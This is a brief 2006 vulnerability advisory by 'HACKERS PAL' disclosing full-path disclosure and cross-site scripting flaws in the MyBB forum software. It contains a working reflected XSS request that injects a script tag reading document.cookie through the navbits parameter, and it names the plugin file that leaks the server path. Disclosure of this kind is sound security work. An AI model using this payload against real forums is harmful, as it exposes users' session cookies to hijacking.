MyBB Full path and Cross site scripting vulnerabilities

security@xxxxxxxxx · 15 Sep 2006 03:03:20 -0000



Hello

Title : MyBB Full path and Cross site scripting vulnerabilities
Discovered by : HACKERS PAL
Copyrights : HACKERS PAL
Website : WwW.SoQoR.NeT
Email : security@xxxxxxxxx

xss
archive/index.php/forum-4.html?GLOBALS[]=1&navbits[][name]=33&navbits[][name]=<script>alert(document.cookie);</script>

full path
inc/plugins/hello.php

WwW.SoQoR.NeT